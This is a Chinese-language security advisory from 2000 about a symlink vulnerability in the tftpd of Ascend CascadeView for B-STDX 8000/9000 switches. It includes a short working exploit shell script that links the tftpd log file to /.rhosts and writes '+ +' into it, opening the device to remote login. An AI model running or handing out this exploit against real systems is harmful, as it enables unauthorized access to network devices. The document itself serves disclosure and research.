Ascend CascadeView tftpd 符号链接漏洞
发布日期:2000-01-02
更新日期:2000-01-02
受影响系统:Ascend CascadeView/UX 1.0
+ Ascend B-STDX 9000 1.0
+ Ascend B-STDX 8000 1.0
描述:
用于Ascend's B-STDX 8000/9000的CascadeView所带的tftpd会在/tmp下创建一个名为
tftpd_xfer_status.log的文件.如果/tmp/tftpd_xfer_status.log已经存在并且是个
符号链接,tftpd就会覆盖该链接所指向文件的内容.攻击者可能创建一个指向/.rhosts
的链接来获得对网络设备的控制权限.很显然,既然这是一个网络设备的安全问题,这种
攻击所带来的危害要比在单个主机上大得多.
< 发现者: loneguard@crazymonkey.net >
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/bin/sh
#
# tftpserv.sh - Loneguard 07/03/99
#
# Buggy tftp server shipped with CascadeView B-STDX 8000/9000
#
rm /tmp/tftpd_xfer_status.log
ln -s /.rhosts /tmp/tftpd_xfer_status.log
echo KungFu > crazymonkey
( sleep 1 ; echo put crazymonkey ; sleep 1 ; echo quit ) | tftp 127.1
echo "+ +" > /.rhosts
建议:
暂无
浏览次数:6806
严重程度:0(网友投票)
